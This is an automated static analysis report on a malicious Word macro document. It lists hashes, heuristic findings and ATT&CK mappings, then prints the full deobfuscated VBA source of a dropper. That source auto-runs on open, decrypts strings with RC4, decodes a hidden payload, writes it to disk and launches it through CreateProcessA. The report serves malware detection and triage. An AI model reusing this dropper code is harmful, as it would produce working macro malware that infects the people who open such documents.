Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c93bc18885122eb1…

MALICIOUS

Office (OOXML)

166.0 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-08-03
MD5: af26cda9e3e9184980b38095088afc2f SHA-1: fa397c542c55e449c8a77344ae4d8e9afc08397c SHA-256: c93bc18885122eb154bc5397999d8b66fbc54e3f19df4f9e4ccee5d09d1f6d03
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is an OOXML document containing VBA macros, indicated by multiple heuristic firings including 'OOXML_VBA' and 'OLE_VBA_DOCOPEN'. The 'SE_ENABLE_LURE' heuristic confirms the document uses a common social engineering tactic to prompt users to enable macros. The presence of a 'Document_Open' macro and the embedded 'macros.bas' file suggest the macro is designed to execute automatically upon opening. While the specific payload is obfuscated, the overall pattern points to a macro-based downloader.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    PvX3zQ = Environ(QrFEsQkYiLQQAPH5m(Chr(219) + Chr(66) + Chr(219) + Chr(241) + Chr(50) + Chr(33) + Chr(251), "FuPYSBMbAMyl06")) & "\" & D8ZjcrKSss7p & QrFEsQkYiLQQAPH5m(Chr(176) + Chr(123) + Chr(181) + Chr(225), "VpQkgaR3pAPah8Qs0")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15540 bytes
SHA-256: 38fa880645d67c99b9dc0908b09603986fab77df6d669e2ca0751d47cb95242f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
103 of 192 identifiers look randomly generated (e.g. 'QrFEsQkYiLQQAPH5m') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Type BLgfcWX8d
   Mz3YgO7olo2Sy As Long
   W8vcTEQ As Long
   JIBGjSn072DotS As Long
   O7DeBFUA2AEbxui As Long
End Type
Private Type OpdfSoHDmMP
   BsEO As Long
   VVsP09cPdW1MzwQ5C As String
   RtRPA As String
   Bu4kumDGm6GZiJq As String
   C0wP9bcG8mUY As Long
   IkszXKoo93 As Long
   EIM As Long
   W53MS02MDCSx As Long
   KEBMQMYf As Long
   PJG5pQo7vVmQ As Long
   MhDqMoxij5qgtoJK As Long
   W3w6lTevZN As Long
   XRac As Integer
   TN0SX As Integer
   IGd6sGPm48koFZUvB As Long
   YSEGq4hD9J8Vl3MYZ As Long
   RlSxC1tNxrk As Long
   LgNA6Ws6Ua8 As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Jqo3L6pjDHqWFxZDo As String, ByVal WcK1u53rDFgJKS As String, S5ZE1YSewSxk As Any, Tj4Xc6wNFS4Tnf As Any, ByVal YY6v5s7C6JC As Long, ByVal LmEpLKaiTUUaX As Long, IHUm8XOjqPmPQ3qT As Any, ByVal X0mfsJf32vvR7M0 As String, DGPylg52hP As OpdfSoHDmMP, Myx8qwIMdbk As BLgfcWX8d) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (GWbWC49Q07B As Any, GacLduerKK As Any, ByVal YdaWVria As Long)
Private HYNWr(0 To 255) As Integer
Private Declare Function CloseHandle Lib "kernel32" (ByVal Sz2xwu83uu As Long) As Long
Private Dkshp1FFo92uB As String
Private P7WstS5hL(0 To 63) As Byte
Private GiYgpVz5v(0 To 255) As Byte
Private GuZMMyAan  As Boolean
Private Declare Sub UFnLW Lib "kernel32" Alias "RtlMoveMemory" (ByVal J2lCyXXa3HI As Long, ByVal PxdFfjCOS1yK8p As Long, ByVal Tjyhoys6 As Long)
Function UxXGMFFdwyP7pRk5(Xv9qmKwlOC As String) As String
If Xv9qmKwlOC = "" Then Exit Function
UxXGMFFdwyP7pRk5 = StrConv(XHknVHvwXhDo5g(Xv9qmKwlOC), vbUnicode)
End Function
Function XONkRxkhajmi() As String
XONkRxkhajmi = UxXGMFFdwyP7pRk5(UserForm1.TextBox1.Text)
End Function
Private Property Let GIngIj(UEtgdiuRR9k As String)
Dim OocXc7pkejkBsUUBQ As Long, Jc0Cu As Long, YX1OCG8D7R6 As Byte, Hwybkj3i6S() As Byte, JMMNuI8m As Long
If (Dkshp1FFo92uB = UEtgdiuRR9k) Then Exit Property
Dkshp1FFo92uB = UEtgdiuRR9k
Hwybkj3i6S() = StrConv(Dkshp1FFo92uB, vbFromUnicode)
JMMNuI8m = Len(Dkshp1FFo92uB)
For OocXc7pkejkBsUUBQ = 0 To 255
HYNWr(OocXc7pkejkBsUUBQ) = OocXc7pkejkBsUUBQ
Next OocXc7pkejkBsUUBQ
For OocXc7pkejkBsUUBQ = 0 To 255
Jc0Cu = (Jc0Cu + HYNWr(OocXc7pkejkBsUUBQ) + Hwybkj3i6S(OocXc7pkejkBsUUBQ Mod JMMNuI8m)) Mod 256
YX1OCG8D7R6 = HYNWr(OocXc7pkejkBsUUBQ)
HYNWr(OocXc7pkejkBsUUBQ) = HYNWr(Jc0Cu)
HYNWr(Jc0Cu) = YX1OCG8D7R6
Next
End Property
Function XHknVHvwXhDo5g(KE9PIayTd5JECN4t As String) As Byte()
If Not GuZMMyAan Then Fgdb0o125mc8
Dim XDVlXF() As Byte, MpA20nXUb() As Byte, Olap33hpNJU() As Byte, Mrujx7QsimCmSLQ As Long, RvviwemJp2Q5 As Long
XDVlXF = KE9PIayTd5JECN4t
ReDim MpA20nXUb(LBound(XDVlXF) To (UBound(XDVlXF) * 2)) As Byte
RvviwemJp2Q5 = LBound(MpA20nXUb)
For Mrujx7QsimCmSLQ = LBound(XDVlXF) To UBound(XDVlXF)
XDVlXF(Mrujx7QsimCmSLQ) = GiYgpVz5v(XDVlXF(Mrujx7QsimCmSLQ))
Next Mrujx7QsimCmSLQ
For Mrujx7QsimCmSLQ = LBound(XDVlXF) To (UBound(XDVlXF) - ((UBound(XDVlXF) Mod 8) + 8)) Step 8
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
MpA20nXUb(RvviwemJp2Q5 + 2) = ((XDVlXF(Mrujx7QsimCmSLQ + 4) And 3) * 64) + XDVlXF(Mrujx7QsimCmSLQ + 6)
RvviwemJp2Q5 = RvviwemJp2Q5 + 3
Next Mrujx7QsimCmSLQ
Select Case (UBound(XDVlXF) Mod 8)
Case 3
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
Case 5:
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
RvviwemJp2Q5 = RvviwemJp2Q5 + 1
Case 7
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
MpA20nXUb(RvviwemJp2Q5 + 2) = ((XDVlXF(Mrujx7QsimCmSLQ + 4) And 3) * 64) + XDVlXF(Mrujx7QsimCmSLQ + 6)
RvviwemJp2Q5 = RvviwemJp2Q5 + 2
End Select
ReDim Olap33hpNJU(LBound(MpA20nXUb) To RvviwemJp2Q5) As Byte
If LBound(MpA20nXUb) = 0 Then RvviwemJp2Q5 = RvviwemJp2Q5 + 1
UFnLW VarPtr(Olap33hpNJU(LBound(Olap33hpNJU))), VarPtr(MpA20nXUb(LBound(MpA20nXUb))), RvviwemJp2Q5
XHknVHvwXhDo5g = Olap33hpNJU
End Function
Function QrFEsQkYiLQQAPH5m(KgdthEHG3otZw As String, XSUzQEeP7j4ED7H As String) As String
Dim byteArray() As Byte
byteArray() = StrConv(KgdthEHG3otZw, vbFromUnicode)
KvRrQ6C1rRyp byteArray(), XSUzQEeP7j4ED7H
QrFEsQkYiLQQAPH5m = StrConv(byteArray(), vbUnicode)
End Function
Sub Ofjrujx7(WvoWVFB As Long)
Dim AvTyXFul5Ag As Long, GOyZGOK6HbD570Vx As Long
AvTyXFul5Ag = 55
GOyZGOK6HbD570Vx = 9
If AvTyXFul5Ag + GOyZGOK6HbD570Vx > 4 Then
GOyZGOK6HbD570Vx = AvTyXFul5Ag + 73
Else
MsgBox 7
End If
Dim M02fF3DPZ6dN1dfYt As Long
Dim VxREqIVmCQl As Long, JIE3XNn3vr8vq As Long
VxREqIVmCQl = 90
JIE3XNn3vr8vq = 55
If VxREqIVmCQl + JIE3XNn3vr8vq > 4 Then
JIE3XNn3vr8vq = VxREqIVmCQl + 33
Else
MsgBox 73
End If
M02fF3DPZ6dN1dfYt = Timer + WvoWVFB
Do While Timer < M02fF3DPZ6dN1dfYt
DoEvents
Loop
Dim XhQOSlRMRXSVa As Long, DAchMA3MkYWyLy4DA As Long
XhQOSlRMRXSVa = 57
DAchMA3MkYWyLy4DA = 27
If XhQOSlRMRXSVa + DAchMA3MkYWyLy4DA > 4 Then
DAchMA3MkYWyLy4DA = XhQOSlRMRXSVa + 92
Else
MsgBox 96
End If
End Sub
Private Function D8ZjcrKSss7p(Optional FACrr As String = "0123456789") As String
Dim Sn3vr8vqqQAD9N3Y As Long, FwVxIdwHpSxm3u As Long
Sn3vr8vqqQAD9N3Y = 51
FwVxIdwHpSxm3u = 74
If Sn3vr8vqqQAD9N3Y + FwVxIdwHpSxm3u > 4 Then
FwVxIdwHpSxm3u = Sn3vr8vqqQAD9N3Y + 51
Else
MsgBox 46
End If
Dim EM848Jk250D0G() As Byte, TDm00hNHF6pF() As Byte, XUU7Gv6o2i As Long, FCCkIpH3qm As Long, RTQJHny As Long, BlMJYNFl As String
Dim T1cvaU As Long, Qvd7rI1gLrV As Long
T1cvaU = 54
Qvd7rI1gLrV = 64
If T1cvaU + Qvd7rI1gLrV > 4 Then
Qvd7rI1gLrV = T1cvaU + 80
Else
MsgBox 60
End If
RTQJHny = 0
Dim KelHcAG As Long, TdvZ2e9n1K6fU As Long
KelHcAG = 51
TdvZ2e9n1K6fU = 97
If KelHcAG + TdvZ2e9n1K6fU > 4 Then
TdvZ2e9n1K6fU = KelHcAG + 32
Else
MsgBox 55
End If
V1QfCh7ZaUdLfYpwd:
Dim PBLoYs7 As Long, YzkdaH1MC0s As Long
PBLoYs7 = 8
YzkdaH1MC0s = 28
If PBLoYs7 + YzkdaH1MC0s > 4 Then
YzkdaH1MC0s = PBLoYs7 + 68
Else
MsgBox 93
End If
Randomize
BlMJYNFl = Int(30 * Rnd)
If BlMJYNFl < 4 Then GoTo V1QfCh7ZaUdLfYpwd
RTQJHny = BlMJYNFl
If RTQJHny > 0& Then
Dim UHKcKGMmXc1n As Long, PN47LZi9 As Long
UHKcKGMmXc1n = 65
PN47LZi9 = 28
If UHKcKGMmXc1n + PN47LZi9 > 4 Then
PN47LZi9 = UHKcKGMmXc1n + 40
Else
MsgBox 77
End If
Randomize
EM848Jk250D0G = FACrr
Dim Im9TdLF As Long, R9cHpb8Mz1MC0s As Long
Im9TdLF = 72
R9cHpb8Mz1MC0s = 81
If Im9TdLF + R9cHpb8Mz1MC0s > 4 Then
R9cHpb8Mz1MC0s = Im9TdLF + 8
Else
MsgBox 28
End If
XUU7Gv6o2i = Len(FACrr) - 1&
RTQJHny = (RTQJHny * 2&) - 1&
Dim DyeeHOIGYicQMjW99 As Long, WJi2tcT0udgI As Long
DyeeHOIGYicQMjW99 = 28
WJi2tcT0udgI = 16
If DyeeHOIGYicQMjW99 + WJi2tcT0udgI > 4 Then
WJi2tcT0udgI = DyeeHOIGYicQMjW99 + 51
Else
MsgBox 45
End If
ReDim TDm00hNHF6pF(RTQJHny) As Byte
For FCCkIpH3qm = 0& To RTQJHny Step 2&
TDm00hNHF6pF(FCCkIpH3qm) = EM848Jk250D0G(CLng(XUU7Gv6o2i * Rnd) * 2&)
Next
Dim M8sZsC9Tkdu As Long, G27tzcU4 As Long
M8sZsC9Tkdu = 5
G27tzcU4 = 37
If M8sZsC9Tkdu + G27tzcU4 > 4 Then
G27tzcU4 = M8sZsC9Tkdu + 39
Else
MsgBox 80
End If
End If
Dim W183ACG2W21udOkTt As Long, TtFUv4PXLL As Long
W183ACG2W21udOkTt = 62
TtFUv4PXLL = 38
If W183ACG2W21udOkTt + TtFUv4PXLL > 4 Then
TtFUv4PXLL = W183ACG2W21udOkTt + 12
Else
MsgBox 64
End If
D8ZjcrKSss7p = TDm00hNHF6pF
Dim FUnT As Long, PHOopy As Long
FUnT = 74
PHOopy = 74
If FUnT + PHOopy > 4 Then
PHOopy = FUnT + 27
Else
MsgBox 44
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim AvVXl4UTWa9nrvN As Long, TzWVkbnhP78kQLPd As Long
AvVXl4UTWa9nrvN = 16
TzWVkbnhP78kQLPd = 6
If AvVXl4UTWa9nrvN + TzWVkbnhP78kQLPd > 4 Then
TzWVkbnhP78kQLPd = AvVXl4UTWa9nrvN + 62
Else
MsgBox 65
End If
Dim PvX3zQ As String
Dim RXSKWvWI As Long, Q3FBJmNF As Long
RXSKWvWI = 53
Q3FBJmNF = 17
If RXSKWvWI + Q3FBJmNF > 4 Then
Q3FBJmNF = RXSKWvWI + 73
Else
MsgBox 4
End If
Dim Dol7gUshh15xa As Long, NRHJ3qgW As Long, UZ0NRrD4bs As Long, LyByTS6ztk As Integer
Dim AyMMu1Gix As Long, AE6eKCUx5K8l As Long
AyMMu1Gix = 50
AE6eKCUx5K8l = 26
If AyMMu1Gix + AE6eKCUx5K8l > 4 Then
AE6eKCUx5K8l = AyMMu1Gix + 44
Else
MsgBox 89
End If
Dol7gUshh15xa = 100000000: NRHJ3qgW = 0: UZ0NRrD4bs = 0
Dim Ja2OCPPC As Long, YIKkAOjAnhYXS As Long
Ja2OCPPC = 81
YIKkAOjAnhYXS = 6
If Ja2OCPPC + YIKkAOjAnhYXS > 4 Then
YIKkAOjAnhYXS = Ja2OCPPC + 59
Else
MsgBox 97
End If
For NRHJ3qgW = 1 To Dol7gUshh15xa
UZ0NRrD4bs = UZ0NRrD4bs + 1
Next NRHJ3qgW
Dim EO6Q5KMP4Gs As Long, IIz8D1NH As Long
EO6Q5KMP4Gs = 7
IIz8D1NH = 29
If EO6Q5KMP4Gs + IIz8D1NH > 4 Then
IIz8D1NH = EO6Q5KMP4Gs + 17
Else
MsgBox 52
End If
If UZ0NRrD4bs = Dol7gUshh15xa Then
Dim KguXYT As Long, QE7oY6XbGOKY As Long
KguXYT = 64
QE7oY6XbGOKY = 57
If KguXYT + QE7oY6XbGOKY > 4 Then
QE7oY6XbGOKY = KguXYT + 79
Else
MsgBox 12
End If
PvX3zQ = Environ(QrFEsQkYiLQQAPH5m(Chr(219) + Chr(66) + Chr(219) + Chr(241) + Chr(50) + Chr(33) + Chr(251), "FuPYSBMbAMyl06")) & "\" & D8ZjcrKSss7p & QrFEsQkYiLQQAPH5m(Chr(176) + Chr(123) + Chr(181) + Chr(225), "VpQkgaR3pAPah8Qs0")
Dim HiIxELltL As Long, TPyHYWr9aBjOyB As Long
HiIxELltL = 29
TPyHYWr9aBjOyB = 62
If HiIxELltL + TPyHYWr9aBjOyB > 4 Then
TPyHYWr9aBjOyB = HiIxELltL + 36
Else
MsgBox 43
End If
LyByTS6ztk = FreeFile
Open PvX3zQ For Binary Access Write As #LyByTS6ztk
Put #LyByTS6ztk, , XONkRxkhajmi
Close #LyByTS6ztk
Ofjrujx7 1
JWui3lpTWZHHrTz PvX3zQ
ActiveDocument.Range.Text = QrFEsQkYiLQQAPH5m(Chr(214) + Chr(15) + Chr(34), "CQKO5pemF")
End If
Dim CtHZmZsTJMh As Long, BWLLV As Long
CtHZmZsTJMh = 46
BWLLV = 12
If CtHZmZsTJMh + BWLLV > 4 Then
BWLLV = CtHZmZsTJMh + 16
Else
MsgBox 55
End If
End Sub
Sub KvRrQ6C1rRyp(L79Bvi00YVG() As Byte, Optional ATmIkOQnut5 As String)
Dim Ynkg9vPP As Long, Xsr As Long, DAKTexFlX6vO As Byte, BozNB4V3E As Long, TfzA4Ax4DTU7Xqp7 As Long, HMQMYf2EqPdZ As Long, KK2VmQ(0 To 255) As Integer
If (Len(ATmIkOQnut5) > 0) Then GIngIj = ATmIkOQnut5
RtlMoveMemory KK2VmQ(0), HYNWr(0), 512
TfzA4Ax4DTU7Xqp7 = UBound(L79Bvi00YVG) + 1
HMQMYf2EqPdZ = TfzA4Ax4DTU7Xqp7
For BozNB4V3E = 0 To (TfzA4Ax4DTU7Xqp7 - 1)
Ynkg9vPP = (Ynkg9vPP + 1) Mod 256
Xsr = (Xsr + KK2VmQ(Ynkg9vPP)) Mod 256
DAKTexFlX6vO = KK2VmQ(Ynkg9vPP)
KK2VmQ(Ynkg9vPP) = KK2VmQ(Xsr)
KK2VmQ(Xsr) = DAKTexFlX6vO
L79Bvi00YVG(BozNB4V3E) = L79Bvi00YVG(BozNB4V3E) Xor (KK2VmQ((KK2VmQ(Ynkg9vPP) + KK2VmQ(Xsr)) Mod 256))
Next
End Sub
Sub Fgdb0o125mc8()
P7WstS5hL(0) = 65
P7WstS5hL(1) = 66
P7WstS5hL(2) = 67
P7WstS5hL(3) = 68
P7WstS5hL(4) = 69
P7WstS5hL(5) = 70
P7WstS5hL(6) = 71
P7WstS5hL(7) = 72
P7WstS5hL(8) = 73
P7WstS5hL(9) = 74
P7WstS5hL(10) = 75
P7WstS5hL(11) = 76
P7WstS5hL(12) = 77
P7WstS5hL(13) = 78
P7WstS5hL(14) = 79
P7WstS5hL(15) = 80
P7WstS5hL(16) = 81
P7WstS5hL(17) = 82
P7WstS5hL(18) = 83
P7WstS5hL(19) = 84
P7WstS5hL(20) = 85
P7WstS5hL(21) = 86
P7WstS5hL(22) = 87
P7WstS5hL(23) = 88
P7WstS5hL(24) = 89
P7WstS5hL(25) = 90
P7WstS5hL(26) = 97
P7WstS5hL(27) = 98
P7WstS5hL(28) = 99
P7WstS5hL(29) = 100
P7WstS5hL(30) = 101
P7WstS5hL(31) = 102
P7WstS5hL(32) = 103
P7WstS5hL(33) = 104
P7WstS5hL(34) = 105
P7WstS5hL(35) = 106
P7WstS5hL(36) = 107
P7WstS5hL(37) = 108
P7WstS5hL(38) = 109
P7WstS5hL(39) = 110
P7WstS5hL(40) = 111
P7WstS5hL(41) = 112
P7WstS5hL(42) = 113
P7WstS5hL(43) = 114
P7WstS5hL(44) = 115
P7WstS5hL(45) = 116
P7WstS5hL(46) = 117
P7WstS5hL(47) = 118
P7WstS5hL(48) = 119
P7WstS5hL(49) = 120
P7WstS5hL(50) = 121
P7WstS5hL(51) = 122
P7WstS5hL(52) = 48
P7WstS5hL(53) = 49
P7WstS5hL(54) = 50
P7WstS5hL(55) = 51
P7WstS5hL(56) = 52
P7WstS5hL(57) = 53
P7WstS5hL(58) = 54
P7WstS5hL(59) = 55
P7WstS5hL(60) = 56
P7WstS5hL(61) = 57
P7WstS5hL(62) = 43
P7WstS5hL(63) = 47
GiYgpVz5v(65) = 0
GiYgpVz5v(66) = 1
GiYgpVz5v(67) = 2
GiYgpVz5v(68) = 3
GiYgpVz5v(69) = 4
GiYgpVz5v(70) = 5
GiYgpVz5v(71) = 6
GiYgpVz5v(72) = 7
GiYgpVz5v(73) = 8
GiYgpVz5v(74) = 9
GiYgpVz5v(75) = 10
GiYgpVz5v(76) = 11
GiYgpVz5v(77) = 12
GiYgpVz5v(78) = 13
GiYgpVz5v(79) = 14
GiYgpVz5v(80) = 15
GiYgpVz5v(81) = 16
GiYgpVz5v(82) = 17
GiYgpVz5v(83) = 18
GiYgpVz5v(84) = 19
GiYgpVz5v(85) = 20
GiYgpVz5v(86) = 21
GiYgpVz5v(87) = 22
GiYgpVz5v(88) = 23
GiYgpVz5v(89) = 24
GiYgpVz5v(90) = 25
GiYgpVz5v(97) = 26
GiYgpVz5v(98) = 27
GiYgpVz5v(99) = 28
GiYgpVz5v(100) = 29
GiYgpVz5v(101) = 30
GiYgpVz5v(102) = 31
GiYgpVz5v(103) = 32
GiYgpVz5v(104) = 33
GiYgpVz5v(105) = 34
GiYgpVz5v(106) = 35
GiYgpVz5v(107) = 36
GiYgpVz5v(108) = 37
GiYgpVz5v(109) = 38
GiYgpVz5v(110) = 39
GiYgpVz5v(111) = 40
GiYgpVz5v(112) = 41
GiYgpVz5v(113) = 42
GiYgpVz5v(114) = 43
GiYgpVz5v(115) = 44
GiYgpVz5v(116) = 45
GiYgpVz5v(117) = 46
GiYgpVz5v(118) = 47
GiYgpVz5v(119) = 48
GiYgpVz5v(120) = 49
GiYgpVz5v(121) = 50
GiYgpVz5v(122) = 51
GiYgpVz5v(48) = 52
GiYgpVz5v(49) = 53
GiYgpVz5v(50) = 54
GiYgpVz5v(51) = 55
GiYgpVz5v(52) = 56
GiYgpVz5v(53) = 57
GiYgpVz5v(54) = 58
GiYgpVz5v(55) = 59
GiYgpVz5v(56) = 60
GiYgpVz5v(57) = 61
GiYgpVz5v(43) = 62
GiYgpVz5v(47) = 63
End Sub
Private Function JWui3lpTWZHHrTz(Sxj9Jl As String)
Dim PVvu7UH9z As Long, CcXHJKxIZ0 As Long
PVvu7UH9z = 40
CcXHJKxIZ0 = 31
If PVvu7UH9z + CcXHJKxIZ0 > 4 Then
CcXHJKxIZ0 = PVvu7UH9z + 32
Else
MsgBox 29
End If
Dim YEXhx6MAzKCOZ9l As BLgfcWX8d, XwxjEg9BwXceDl As OpdfSoHDmMP, GORVOMiM As String
Dim V39C0tiVJTCN6bhYi As Long, IXBXZY3O As Long
V39C0tiVJTCN6bhYi = 68
IXBXZY3O = 20
If V39C0tiVJTCN6bhYi + IXBXZY3O > 4 Then
IXBXZY3O = V39C0tiVJTCN6bhYi + 18
Else
MsgBox 49
End If
XwxjEg9BwXceDl.BsEO = Len(XwxjEg9BwXceDl)
Dim Xiv1Gu0fZluuZqj As Long, BKiW8VZz9 As Long
Xiv1Gu0fZluuZqj = 32
BKiW8VZz9 = 76
If Xiv1Gu0fZluuZqj + BKiW8VZz9 > 4 Then
BKiW8VZz9 = Xiv1Gu0fZluuZqj + 45
Else
MsgBox 65
End If
CreateProcessA GORVOMiM, Sxj9Jl, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, GORVOMiM, XwxjEg9BwXceDl, YEXhx6MAzKCOZ9l
Dim Xt8leWDhmIC4tb As Long, CiA928YPw As Long
Xt8leWDhmIC4tb = 77
CiA928YPw = 66
If Xt8leWDhmIC4tb + CiA928YPw > 4 Then
CiA928YPw = Xt8leWDhmIC4tb + 2
Else
MsgBox 95
End If
CloseHandle YEXhx6MAzKCOZ9l.W8vcTEQ
Dim FmdOmUxD2kT4aGy As Long, Keo4yVaxYpGCufP0z As Long
FmdOmUxD2kT4aGy = 69
Keo4yVaxYpGCufP0z = 64
If FmdOmUxD2kT4aGy + Keo4yVaxYpGCufP0z > 4 Then
Keo4yVaxYpGCufP0z = FmdOmUxD2kT4aGy + 8
Else
MsgBox 50
End If
CloseHandle YEXhx6MAzKCOZ9l.Mz3YgO7olo2Sy
Dim HQTC4IJdAwHtA8 As Long, UICmO As Long
HQTC4IJdAwHtA8 = 39
UICmO = 29
If HQTC4IJdAwHtA8 + UICmO > 4 Then
UICmO = HQTC4IJdAwHtA8 + 85
Else
MsgBox 16
End If
End Function


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{53A9968D-EC8A-426E-9B2F-BB1C657FBB58}{832D7A7A-95E3-45C1-B0DC-219EE761750A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 281088 bytes
SHA-256: dbae12add99c90437b24e2337bb84ed1bdeb3fdea3fda08d4f6ecf258ecc3706
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
2621 of 4575 identifiers look randomly generated (e.g. 'ngEAAAAAAJ6eAQAAAAAA6J0BANidAQDCnQEAtJ0B'); 17 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.